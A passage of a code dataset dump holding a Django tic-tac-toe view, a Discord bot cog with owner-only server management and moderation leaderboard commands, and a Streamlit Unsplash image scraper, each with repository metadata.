== board[1][1] and board[1][1] == board[2][2]:\n\t\t\t\treturn True\n\n\t\t\tif board[0][2] == board[1][1] and board[1][1] == board[2][0]:\n\t\t\t\treturn True\n\t\treturn False\n\ndef emptyBoard():\n\treturn [['_','_', '_'], ['_', '_', '_'], ['_', '_', '_']]\n\ndef index(request):\n\t# If they don't have a board, give them a board\n\tif \"board\" not in request.session.keys():\n\t\trequest.session[\"board\"] = emptyBoard()\n\tboard = request.session[\"board\"]\n\n\t# If they are here because they played a move\n\tif request.method == \"POST\":\n\t\t# Let them play their move\n\t\tif board[int(request.POST[\"row\"])][int(request.POST[\"col\"])] == \"_\":\n\t\t\tboard[int(request.POST[\"row\"])][int(request.POST[\"col\"])] = \"X\"\n\n\t\t# If they won, or we won, then reset the board\n\t\tif shouldReset(board):\n\t\t\tboard = emptyBoard()\n\n\t\t# Otherwise, we play in any tile that we can, if we can play at all\n\t\telse:\n\t\t\tplayed = False\n\t\t\tfor row in range(0,3):\n\t\t\t\tfor col in range(0,3):\n\t\t\t\t\tif board[row][col] == \"_\" and not played:\n\t\t\t\t\t\tboard[row][col] = \"O\"\n\t\t\t\t\t\tplayed = True\n\t\t\t\t\t\n\t\t# Send the board back to be rendered\n\t\trequest.session[\"board\"] = board\n\t\trequest.session.modified = True\n\n\treturn render(request, \"tictactoe/index.html\", {\"board\":request.session[\"board\"]})\n\n\n\t\n", "repo_name": "elijahtai14/CS33aTeachingMaterials", "sub_path": "section2/sect2_game_working/tictactoe/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "9365237396", "text": "import asyncio\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom jishaku.paginators import PaginatorEmbedInterface, PaginatorInterface\r\n\r\nfrom .utils.config import read\r\nfrom .utils.entry_helper import Case, Converters\r\nimport typing\r\n\r\n\r\nclass DynamicGuild(commands.Converter):\r\n\tasync def convert(self, ctx, argument):\r\n\t\ttry:\r\n\t\t\targument = int(argument)\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\tbot = ctx.bot\r\n\t\tif isinstance(argument, int):\r\n\t\t\t# check if its an ID first, else check enumerator\r\n\t\t\tguild = bot.get_guild(argument)\r\n\t\t\tif guild is not None: # YAY\r\n\t\t\t\treturn guild\r\n\t\t\telse: # AWW\r\n\t\t\t\tfor number, guild in enumerate(bot.guilds, start=1):\r\n\t\t\t\t\tif number == argument:\r\n\t\t\t\t\t\treturn guild\r\n\t\t\t\telse:\r\n\t\t\t\t\tif guild is None:\r\n\t\t\t\t\t\traise commands.BadArgument(f\"Could not convert '{argument}' to 'Guild' with reason 'type None'\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\traise commands.BadArgument(f\"Could not convert '{argument}' to 'Guild' as loop left.\")\r\n\t\telif isinstance(argument, str): # assume its a name\r\n\t\t\tfor guild in bot.guilds:\r\n\t\t\t\tif guild.name.lower() == argument.lower():\r\n\t\t\t\t\treturn guild\r\n\t\t\telse:\r\n\t\t\t\traise commands.BadArgument(f\"Could not convert '{argument}' to 'Guild' with reason 'type None' at 1\")\r\n\t\telse:\r\n\t\t\traise commands.BadArgument(f\"Could not convert argument of type '{type(argument)}' to 'Guild'\")\r\n\r\n\r\nclass Meta(commands.Cog):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t@commands.command(name=\"stats\", hidden=True)\r\n\t@commands.bot_has_permissions(embed_links=True)\r\n\tasync def statistics(self, ctx: commands.Context):\r\n\t\t\"\"\"Shows the bot's statistics. Pretty simple.\"\"\"\r\n\t\tfrom datetime import datetime, timedelta\r\n\t\tdef p(n):\r\n\t\t\treturn f'+{n}' if n > 0 else str(n)\r\n\r\n\t\tdef s(n, n2):\r\n\t\t\tif n > n2:\r\n\t\t\t\treturn \"\\U00002b06\"\r\n\t\t\telif n < n2:\r\n\t\t\t\treturn \"\\U00002b07\"\r\n\t\t\telse:\r\n\t\t\t\treturn \"\"\r\n\r\n\t\tno = datetime.utcnow()\r\n\t\tyesterday = no - timedelta(-1)\r\n\t\ttya = no - timedelta(-2)\r\n\t\tguilds_two_days = len([\r\n\t\t\tn for n in self.bot.guilds if n.me.joined_at.day == tya.day and n.me.joined_at.month == tya.month \\\r\n\t\t\t and n.me.joined_at.year == tya.year\r\n\t\t])\r\n\t\tguilds_yesterday = len([\r\n\t\t\tn for n in self.bot.guilds if\r\n\t\t\tn.me.joined_at.day == yesterday.day and n.me.joined_at.month == yesterday.month \\\r\n\t\t\tand n.me.joined_at.year == yesterday.year\r\n\t\t])\r\n\t\tguilds_today = len([\r\n\t\t\tn for n in self.bot.guilds if\r\n\t\t\tn.me.joined_at.day == no.day and n.me.joined_at.month == no.month and n.me.joined_at.year == no.year\r\n\t\t])\r\n\t\tguilds_tomorrow = guilds_today + (guilds_two_days + guilds_yesterday)\r\n\t\tguilds_ind = guilds_tomorrow + (guilds_yesterday + guilds_today)\r\n\r\n\t\tgtd = guilds_two_days\r\n\t\tawait ctx.send(\r\n\t\t\tf\"**Guilds:**\\nTotal: {len(self.bot.guilds)}\\n\\nTwo Days Ago: {p(gtd)}\\n\"\r\n\t\t\tf\"Yesterday: {p(guilds_yesterday)} {s(guilds_yesterday, gtd)}\\n\"\r\n\t\t\tf\"Today: {p(guilds_today)} {s(guilds_today, guilds_yesterday)}\\n\"\r\n\t\t\tf\"*Predicted Futures:*\\n\"\r\n\t\t\tf\"Tomorrow: {p(guilds_tomorrow)}\\n\"\r\n\t\t\tf\"In Two Days: {p(guilds_ind)}\"\r\n\t\t)\r\n\r\n\t@commands.Cog.listener()\r\n\tasync def on_command_error(self, ctx, error):\r\n\t\tignored = commands.CommandNotFound\r\n\t\tif isinstance(error, ignored):\r\n\t\t\treturn # we don't really care\r\n\r\n\t\tif isinstance(error, commands.NotOwner):\r\n\t\t\treturn await ctx.send(\"You're not my owner!\")\r\n\t\telif isinstance(error, commands.BotMissingPermissions):\r\n\t\t\tmperms = [str(x).replace('_', ' ') for x in error.missing_perms]\r\n\t\t\tasd = \"'\"\r\n\t\t\te = discord.Embed(\r\n\t\t\t\ttitle=\"Im missing permissions!\",\r\n\t\t\t\tdescription=f\"Give me '{f'{asd}, {asd}'.join(mperms)}' first!\",\r\n\t\t\t\tcolor=discord.Color.dark_orange()\r\n\t\t\t)\r\n\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages and ctx.channel.permissions_for(ctx.me).embed_links:\r\n\t\t\t\treturn await ctx.send(embed=e)\r\n\t\t\telse:\r\n\t\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages:\r\n\t\t\t\t\treturn await ctx.send(\"Im missing core permissions, like embed links. provide this and try again.\")\r\n\t\telif isinstance(error, commands.MissingPermissions):\r\n\t\t\tmperms = [str(x).replace('_', ' ') for x in error.missing_perms]\r\n\t\t\tasd = \"'\"\r\n\t\t\te = discord.Embed(\r\n\t\t\t\ttitle=\"You are missing permissions!\",\r\n\t\t\t\tdescription=f\"You need '{f'{asd}, {asd}'.join(mperms)}' first!\",\r\n\t\t\t\tcolor=discord.Color.dark_orange()\r\n\t\t\t)\r\n\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages and ctx.channel.permissions_for(ctx.me).embed_links:\r\n\t\t\t\treturn await ctx.send(embed=e)\r\n\t\t\telse:\r\n\t\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages:\r\n\t\t\t\t\treturn await ctx.send(\"Im missing core permissions, like embed links. provide this and try again.\")\r\n\r\n\t\telif \"has been disabled by a server admin.\" in str(error):\r\n\t\t\treturn await ctx.send(str(error))\r\n\t\telif isinstance(error, commands.CommandOnCooldown):\r\n\t\t\ttry_again = Converters.fix_time(error.retry_after)\r\n\t\t\treturn await ctx.send(f\"{ctx.command.qualified_name} is on cooldown! Try again in {try_again}\")\r\n\t\telif isinstance(error, discord.Forbidden):\r\n\t\t\treturn await ctx.send(f\"I can not do that action because '{error.text}'.\")\r\n\t\telif isinstance(error, asyncio.TimeoutError):\r\n\t\t\treturn await ctx.send(f\"Timed out when waiting for a response.\")\r\n\t\telif isinstance(error, discord.NotFound):\r\n\t\t\treturn await ctx.send(f\"A requested item could not be found: '{error.text}'\")\r\n\t\telse:\r\n\t\t\te = discord.Embed(\r\n\t\t\t\ttitle=\"oops!\",\r\n\t\t\t\tdescription=f\"an error occured: `{str(error)}`. Please inform my developer in the [support server]\"\r\n\t\t\t\t\t\t\tf\"(https://beta.dragdev.xyz/r/server.html).\\n\\nIf this is a common error, please tell my \"\r\n\t\t\t\t\t\t\tf\"dev that this error is common.\",\r\n\t\t\t\tcolor=discord.Color.dark_red(),\r\n\t\t\t\turl='https://dragdev.xyz/redirects/server.html'\r\n\t\t\t)\r\n\t\t\tawait ctx.send(embed=e)\r\n\t\t\traise error\r\n\r\n\t@commands.group(invoke_without_command=True)\r\n\t@commands.is_owner()\r\n\tasync def servers(self, ctx):\r\n\t\t\"\"\"Lists servers.\"\"\"\r\n\t\tpaginator = PaginatorEmbedInterface(self.bot, commands.Paginator(prefix=\"```md\", max_size=500))\r\n\t\tfor number, guild in enumerate(ctx.bot.guilds, start=1):\r\n\t\t\tdot = '\\u200B.'\r\n\t\t\tbacktick = '\\u200B`'\r\n\t\t\tawait paginator.add_line(\r\n\t\t\t\tdiscord.utils.escape_markdown(f'{number}. {guild.name.replace(\".\", dot).replace(\"`\", backtick)}\\n'))\r\n\t\tawait paginator.send_to(ctx.channel)\r\n\r\n\t@servers.command(aliases=['join'])\r\n\t@commands.is_owner()\r\n\tasync def invite(self, ctx, *, guild: DynamicGuild()):\r\n\t\t\"\"\"get an invite to a guild\r\n\r\n\t\tyou can pass a name, id or enumerator number. ID is better.\"\"\"\r\n\t\tif guild.me.guild_permissions.manage_guild:\r\n\t\t\tm = await ctx.send(\"Attempting to find an invite.\")\r\n\t\t\tinvites = await guild.invites()\r\n\t\t\tfor invite in invites:\r\n\t\t\t\tif invite.max_age == 0:\r\n\t\t\t\t\treturn await m.edit(content=f\"Infinite Invite: {invite}\")\r\n\t\t\telse:\r\n\t\t\t\tawait m.edit(content=\"No Infinite Invites found - creating.\")\r\n\t\t\t\tfor channel in guild.text_channels:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tinvite = await channel.create_invite(max_age=60, max_uses=1, unique=True,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t reason=f\"Invite requested\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" by {ctx.author} via official management command. do not be alarmed, this is usually just\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" to check something.\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn await m.edit(content=f\"Unable to create an invite - missing permissions.\")\r\n\t\t\t\tawait m.edit(content=f\"Temp invite: {invite.url} -> max age: 60s, max uses: 1\")\r\n\t\telse:\r\n\t\t\tm = await ctx.send(\"Attempting to create an invite.\")\r\n\t\t\tfor channel in guild.text_channels:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tinvite = await channel.create_invite(max_age=60, max_uses=1, unique=True,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t reason=f\"Invite requested\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" by {ctx.author} via official management command. do not be alarmed, this is usually just\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" to check something.\")\r\n\t\t\t\t\tbreak\r\n\t\t\t\texcept:\r\n\t\t\t\t\tcontinue\r\n\t\t\telse:\r\n\t\t\t\treturn await m.edit(content=f\"Unable to create an invite - missing permissions.\")\r\n\t\t\tawait m.edit(content=f\"Temp invite: {invite.url} -> max age: 60s, max uses: 1\")\r\n\r\n\t@servers.command(name='leave')\r\n\t@commands.is_owner()\r\n\tasync def _leave(self, ctx, guild: DynamicGuild(), *, reason: str = None):\r\n\t\t\"\"\"Leave a guild. if ::reason:: is provided, then an embed is sent to the guild owner/system channel\r\n\t\tstating who made the bot leave (you), the reason and when.\r\n\r\n\t\tsupply no reason to do a 'silent' leave\"\"\"\r\n\t\tif reason:\r\n\t\t\te = discord.Embed(color=discord.Color.orange(), description=reason, timestamp=ctx.message.created_at)\r\n\t\t\te.set_author(name=str(ctx.author), icon_url=ctx.author.avatar_url_as(static_format='png'))\r\n\t\t\tif guild.system_channel is not None:\r\n\t\t\t\tif guild.system_channel.permissions_for(guild.me).send_messages:\r\n\t\t\t\t\tif guild.system_channel.permissions_for(guild.me).embed_links:\r\n\t\t\t\t\t\tawait guild.system_channel.send(embed=e)\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tawait guild.owner.send(embed=e)\r\n\t\t\t\texcept discord.Forbidden:\r\n\t\t\t\t\tpass\r\n\r\n\t\tawait guild.leave()\r\n\t\tawait ctx.send(f\"Left {guild.name} ({guild.id}) {f'for: {reason}' if reason else ''}\")\r\n\r\n\t@servers.command()\r\n\t@commands.is_owner()\r\n\tasync def info(self, ctx, *, guild: DynamicGuild()):\r\n\t\t\"\"\"Force get information on a guild. this includes debug information.\"\"\"\r\n\t\towner, mention = guild.owner, guild.owner.mention\r\n\t\ttext_channels = len(guild.text_channels)\r\n\t\tvoice_channels = len(guild.text_channels)\r\n\t\troles, totalroles = [(role.name, role.permissions) for role in reversed(guild.roles)], len(guild.roles)\r\n\t\tbots, humans = len([u for u in guild.members if u.bot]), len([u for u in guild.members if not u.bot])\r\n\r\n\t\tdef get_siplified_ratio():\r\n\t\t\tx = bots\r\n\t\t\ty = humans\r\n\r\n\t\t\tdef get_hcf():\r\n\t\t\t\tif x > y:\r\n\t\t\t\t\tsmaller = y\r\n\t\t\t\telse:\r\n\t\t\t\t\tsmaller = x\r\n\t\t\t\tfor i in range(smaller, 0, -1):\r\n\t\t\t\t\tif (x % i == 0) and (y % i == 0):\r\n\t\t\t\t\t\thcf = i\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\traise ArithmeticError(f\"Unable to find HCF for {x} and {y} (smallest {smaller})\")\r\n\t\t\t\treturn hcf\r\n\r\n\t\t\thcf = get_hcf()\r\n\t\t\treturn f\"{x / hcf}:{y / hcf}\"\r\n\r\n\t\tbot_to_human_ratio = '{}:{} ({})'.format(bots, humans, get_siplified_ratio())\r\n\t\tdefault_perms = guild.default_role.permissions.value\r\n\t\tinvites = len(await guild.invites()) if guild.me.guild_permissions.manage_guild else 'Not Available'\r\n\t\tfmt = f\"Owner: {owner} ({owner.mention})\\nText channels: {text_channels}\\nVoice Channels: {voice_channels}\\n\" \\\r\n\t\t\t f\"Roles: {totalroles}\\nBTHR: {bot_to_human_ratio}\\n`@everyone` role permissions: {default_perms}\\nInvites: \" \\\r\n\t\t\t f\"{invites}\"\r\n\t\tawait ctx.send(fmt)\r\n\r\n\t\tpaginator = PaginatorEmbedInterface(self.bot, commands.Paginator(max_size=500))\r\n\t\tfor name, value in roles:\r\n\t\t\tawait paginator.add_line(f\"@{name}: {value}\")\r\n\t\tawait paginator.send_to(ctx.channel)\r\n\t\treturn await ctx.message.add_reaction('\\U00002705')\r\n\r\n\t@servers.command(name=\"ban\", aliases=['unban'])\r\n\t@commands.is_owner()\r\n\tasync def server_ban(self, ctx, guild: typing.Union[DynamicGuild, int], *, reason: str = None):\r\n\t\timport json\r\n\t\tguild: int = guild.id if isinstance(guild, discord.Guild) else guild\r\n\t\toldguild = self.bot.get_guild(guild)\r\n\t\twith open(\"./banned_servers.json\", \"r+\") as bs:\r\n\t\t\ttry:\r\n\t\t\t\tdata = json.load(bs)\r\n\t\t\texcept json.JSONDecodeError:\r\n\t\t\t\tdata = dict()\r\n\t\t\tif data.get(str(guild)):\r\n\t\t\t\tdel data[guild]\r\n\t\t\t\tawait ctx.send(f\"Unbanned guild with ID `{guild}`.\")\r\n\t\t\telse:\r\n\t\t\t\tdata[guild] = {\r\n\t\t\t\t\t\"reason\": reason,\r\n\t\t\t\t\t\"banned at\": str(ctx.message.created_at), # trying not to import too many things here so i can\r\n\t\t\t\t\t# just paste it across bots\r\n\t\t\t\t\t\"banned by\": ctx.author.id\r\n\t\t\t\t}\r\n\t\t\t\treason = reason or \"No Reason Provided\"\r\n\t\t\t\ttry:\r\n\t\t\t\t\tawait oldguild.owner.send(f\"Your server \\\"**{discord.utils.escape_markdown(oldguild.name)}**\\\"\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" has been banned from using me with the following reason: {reason}.\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" To appeal this, please join my support server at\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" <https://beta.dragdev.xyz/r/server.html> and ask a developer\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" for an appeal.\")\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\t\tawait ctx.send(f\"Banned guild with ID `{guild}` with reason {discord.utils.escape_mentions(str(reason))}.\")\r\n\t\twith open(\"./banned_servers.json\", \"w+\") as ab:\r\n\t\t\tjson.dump(data, ab, indent=2)\r\n\t\treturn\r\n\r\n\t@commands.group(aliases=['modboards', 'modlb', 'lbmod'], )\r\n\t@commands.has_permissions(manage_messages=True)\r\n\t@commands.bot_has_permissions(embed_links=True, manage_messages=True, add_reactions=True)\r\n\tasync def modboard(self, ctx, *, sort_by_action: str = 'warns'):\r\n\t\t\"\"\"Shows the moderation leaderboard\"\"\"\r\n\t\ttypes = ['warns', 'mutes', 'unmutes', 'kicks', 'bans', 'unbans', 'all']\r\n\t\tsort_by_action = sort_by_action.lower()\r\n\t\tif sort_by_action not in types:\r\n\t\t\tesc = '\\n• '\r\n\t\t\treturn await ctx.send(f\"No valid type to sort by. Please use one of the following:\\n• {esc.join(types)}\")\r\n\t\telse:\r\n\t\t\tasync with ctx.channel.typing(): # aesthetics don't complain\r\n\t\t\t\tdata = read('./data/core.json')\r\n\t\t\t\tguild = data.get(str(ctx.guild.id))\r\n\t\t\t\tpaginator = PaginatorEmbedInterface(self.bot, commands.Paginator(max_size=1000, prefix='', suffix=''))\r\n\t\t\t\t# paginator = commands.Paginator(max_size=2000)\r\n\t\t\t\tkey = guild.get(sort_by_action)\r\n\t\t\t\tauthors = {}\r\n\t\t\t\tif key:\r\n\t\t\t\t\t# print(key)\r\n\t\t\t\t\tfor _case in key.keys():\r\n\t\t\t\t\t\t# print(_case)\r\n\t\t\t\t\t\t_case = key[_case]\r\n\t\t\t\t\t\t_case['type'] = sort_by_action\r\n\t\t\t\t\t\t_case['ctx'] = ctx\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tcase = await Case.from_dict(_case)\r\n\t\t\t\t\t\texcept (KeyError, Exception):\r\n\t\t\t\t\t\t\tawait ctx.send(f\"Error while creating case - skipping...\", delete_after=10)\r\n\t\t\t\t\t\t\tawait asyncio.sleep(2)\r\n\t\t\t\t\t\tif authors.get(case.author):\r\n\t\t\t\t\t\t\tauthors[case.author] += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tauthors[case.author] = 1\r\n\t\t\t\t\tkeys = sorted(authors.keys(), key=lambda a: authors[a])\r\n\t\t\t\t\t# print(\"sorted\", keys)\r\n\t\t\t\t\tfor rank, user in enumerate(keys, start=1):\r\n\t\t\t\t\t\tif not isinstance(user, (discord.Member, discord.User)):\r\n\t\t\t\t\t\t\tname = f'Unknown (ID: {user})'\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tname = user.display_name\r\n\t\t\t\t\t\tawait paginator.add_line(f\"**{rank}. {name}** with __{authors[user]}__ {sort_by_action}\")\r\n\t\t\t\t\t\t# print(\"adding line\")\r\n\t\t\tif len(paginator.pages) == 0:\r\n\t\t\t\treturn await ctx.send(\"No events under that type found.\")\r\n\t\t\telse:\r\n\t\t\t\tawait paginator.send_to(ctx.channel)\r\n\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(Meta(bot))\r\n", "repo_name": "dragdev-studios/Guardian", "sub_path": "cogs/meta.py", "file_name": "meta.py", "file_ext": "py", "file_size_in_byte": 14165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "88", "api": [{"api_name": "discord.ext.commands.Converter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 12, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 30, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 32, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 38, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 38, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 40, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 40, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog", "line_number": 43, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 43, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 49, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 49, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 47, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 47, "usage_type": "name"}, {"api_name": "discord.ext.commands.bot_has_permissions", "line_number": 48, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 48, "usage_type": "name"}, {"api_name": "discord.ext.commands.CommandNotFound", "line_number": 94, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 94, "usage_type": "name"}, {"api_name": "discord.ext.commands.NotOwner", "line_number": 98, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 98, "usage_type": "name"}, {"api_name": "discord.ext.commands.BotMissingPermissions", "line_number": 100, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 100, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 103, "usage_type": "call"}, {"api_name": "discord.Color.dark_orange", "line_number": 106, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 106, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.MissingPermissions", "line_number": 113, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 113, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.Color.dark_orange", "line_number": 119, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 119, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.CommandOnCooldown", "line_number": 129, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 129, "usage_type": "name"}, {"api_name": "utils.entry_helper.Converters.fix_time", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.entry_helper.Converters", "line_number": 130, "usage_type": "name"}, {"api_name": "discord.Forbidden", "line_number": 132, "usage_type": "attribute"}, {"api_name": "asyncio.TimeoutError", "line_number": 134, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 136, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 139, "usage_type": "call"}, {"api_name": "discord.Color.dark_red", "line_number": 144, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 144, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 92, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 92, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 92, "usage_type": "name"}, {"api_name": "jishaku.paginators.PaginatorEmbedInterface", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.ext.commands.Paginator", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 154, "usage_type": "name"}, {"api_name": "discord.utils.escape_markdown", "line_number": 159, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 159, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.group", "line_number": 150, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 150, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 151, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 151, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 163, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 163, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 211, "usage_type": "call"}, {"api_name": "discord.Color.orange", "line_number": 211, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 211, "usage_type": "attribute"}, {"api_name": "discord.Forbidden", "line_number": 220, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 204, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 204, "usage_type": "name"}, {"api_name": "jishaku.paginators.PaginatorEmbedInterface", "line_number": 264, "usage_type": "call"}, {"api_name": "discord.ext.commands.Paginator", "line_number": 264, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 264, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 227, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 227, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 272, "usage_type": "attribute"}, {"api_name": "discord.Guild", "line_number": 274, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 278, "usage_type": "call"}, {"api_name": "json.JSONDecodeError", "line_number": 279, "usage_type": "attribute"}, {"api_name": "discord.utils.escape_markdown", "line_number": 293, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 293, "usage_type": "attribute"}, {"api_name": "discord.utils.escape_mentions", "line_number": 300, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 300, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 302, "usage_type": "call"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 271, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 271, "usage_type": "name"}, {"api_name": "utils.config.read", "line_number": 317, "usage_type": "call"}, {"api_name": "jishaku.paginators.PaginatorEmbedInterface", "line_number": 319, "usage_type": "call"}, {"api_name": "discord.ext.commands.Paginator", "line_number": 319, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 319, "usage_type": "name"}, {"api_name": "utils.entry_helper.Case.from_dict", "line_number": 331, "usage_type": "call"}, {"api_name": "utils.entry_helper.Case", "line_number": 331, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 334, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.group", "line_number": 305, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 305, "usage_type": "name"}, {"api_name": "discord.ext.commands.has_permissions", "line_number": 306, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 306, "usage_type": "name"}, {"api_name": "discord.ext.commands.bot_has_permissions", "line_number": 307, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 307, "usage_type": "name"}, {"api_name": "{'datetime': 'datetime.datetime', 'timedelta': 'datetime.timedelta', 'json': 'json'}", "line_number": 355, "usage_type": "call"}]} +{"seq_id": "72983801247", "text": "import streamlit as st\nimport requests\nfrom bs4 import BeautifulSoup\nimport webbrowser\n\nst.set_page_config(\n page_title=\"Web Scrapper\",\n page_icon=\"🌐\",\n layout=\"wide\"\n)\n\nst.markdown(\"<h1 style='text-align: center;'>Web Scrapper</h1>\", unsafe_allow_html=True)\n\nwith st.form(\"Busca\"):\n keyword = st.text_input(\"O que procura?\")\n search = st.form_submit_button(\"Buscar Imagens\")\n\nplaceholder = st.empty()\n\nif keyword:\n page = requests.get(f\"https://unsplash.com/s/photos/{keyword}\")\n soup = BeautifulSoup(page.content, \"lxml\")\n rows = soup.find_all(\"div\", class_=\"ripi6\")\n \n col1, col2, col3, col4 = placeholder.columns(4)\n\n for index, row in enumerate(rows):\n figures = row.find_all(\"figure\")\n for i in range(4):\n img = figures[i].find(\"img\", class_=\"tB6UZ a5VGX\")\n img_url = img[\"srcset\"].split(\"?\")[0]\n anchor = figures[i].find(\"a\", class_=\"rEAWd\")\n print(anchor[\"href\"])\n\n if i == 0:\n col1.image(img_url)\n btn = col1.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n print(\"Butão clicado\")\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")\n elif i == 1:\n col2.image(img_url)\n btn = col2.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")\n elif i == 2:\n col3.image(img_url)\n btn = col3.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")\n elif i == 3:\n col4.image(img_url)\n btn = col4.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")", "repo_name": "Joacy/streamlit-image-web-scrapper", "sub_path": "Web_Scrapper.py", "file_name": 